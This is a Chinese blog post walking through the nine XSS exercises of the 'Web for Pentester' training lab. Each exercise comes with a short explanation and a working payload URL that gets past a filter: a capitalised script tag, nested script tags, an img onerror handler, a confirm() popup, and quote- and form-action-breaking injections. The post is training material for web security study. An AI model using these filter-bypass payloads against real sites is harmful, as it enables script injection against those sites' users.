• web for pentester xss


    日期:2020-09-12

    XSS

    • example1

    DOM 型XSS 直接注入

    /xss/example1.php?name=<script>alert("xxx")</script>
    
    • example2

    DOM 型XSS 直接注入 没反应说明有过滤 首字母大写试试注入成功

    /xss/example2.php?name=<Script>alert("xxx")</Script>
    
    • example3

    DOM 型XSS 直接注入 没反应说明有过滤 首字母大写发现没效果 过滤掉了script标签 所以绕过一下使得过滤一次之后一样可以注入

    /xss/example3.php?name=<scr<script>ipt>alert(111)</SC</script>RIPT>
    
    • example4

    输入之前的poc发现直接返回error 应该是判断了script标签 所以只有跟换其他标签触发,例如img标签的onerror函数

    /xss/example3.php?name=<img%20src=""%20%20onerror=alert("111")>
    
    • example5

    输入alert直接报错,可以使用其他的弹出框window.confirm("sometext");window.prompt("sometext","defaultText");

    /xss/example5.php?name=<script>window.confirm("xss")</script>
    
    • example6

    通过f12 发现变量被复制给了a,所以可以直接闭合截断

    /xss/example6.php?name=";alert(111);"
    
    • example7

    通过f12 发现变量被复制给了a,所以可以直接闭合截断 与上面一题有区别的是这次是单引号闭合

    /xss/example7.php?name=hacker%27;%20alert(111);%27
    
    • example8
      通过看F12 可以看到action中的连接就是url,所以可以尝试form表单截断
    /xss/example8.php/"><script>alert("xss")</script>
    
    • example9

    默认url 是显示#hacker 所以是#后面的内容是注入点 但是这个只有在ie上才有效,当然也有可能有别的解题思路

    /xss/example9.php#<script>alert(1)</script>
    
  • 相关阅读:
    docker 安装 nexus3 初始密码不再是admin123
    eclipse中Tomcat修改项目名称
    WAMP3.1.3自定义根目录
    git学习笔记
    小米和MAC触摸板手势汇总
    IDEA快捷键汇总
    servelet 实现Post接口访问
    LeetCode:Jump Game II
    LeetCode:Trapping Rain Water
    LeetCode: Container With Most Water
  • 原文地址:https://www.cnblogs.com/tongchengbin/p/13663389.html
Copyright © 2020-2023  润新知